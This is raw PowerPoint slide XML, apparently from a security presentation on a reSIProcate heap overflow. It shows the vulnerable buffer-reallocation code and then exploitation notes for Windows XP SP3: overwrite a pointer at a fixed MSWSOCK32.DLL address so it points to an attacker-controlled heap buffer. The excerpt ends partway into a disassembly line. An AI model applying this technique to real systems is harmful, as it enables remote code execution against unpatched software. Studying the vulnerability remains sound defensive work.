              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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mBufferPos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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mBufferSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           // .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bwc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. We've filled our buffer; go ahead and make more room.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size_t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newSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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resipMin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">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mBufferSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</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contentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</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newBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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FF8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </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newBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">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newSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">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std</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">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bad_alloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </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ErrLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Failed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a buffer while receiving body!"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </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memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">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newBuffer</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mBuffer</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mBufferSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </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mBufferSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">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newSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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mBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </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mBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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newBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* ... */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="285750"/>
            <a:ext cx="11245850" cy="1096963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reSIProcate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> heap overflow vulnerability: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                the vulnerable code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36549242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42917286-6F5B-45B3-A5EB-602F941ECC33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534677" y="4590146"/>
            <a:ext cx="11217897" cy="1145361"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MSWSOCK32.DLL usually loaded at specific base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Inside MSWSOCK32.DLL the following code is executed repeatedly:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Overwrite the address at 0x71a87210 so it will point to attacker controlled heap buffer, and make it contain 0xCAFEBABE at EAX+0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619250" y="371476"/>
            <a:ext cx="11245850" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reSIProcate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> heap overflow vulnerability: XP SP3 exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2647950" y="3316772"/>
            <a:ext cx="6248400" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x71A53F8F:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
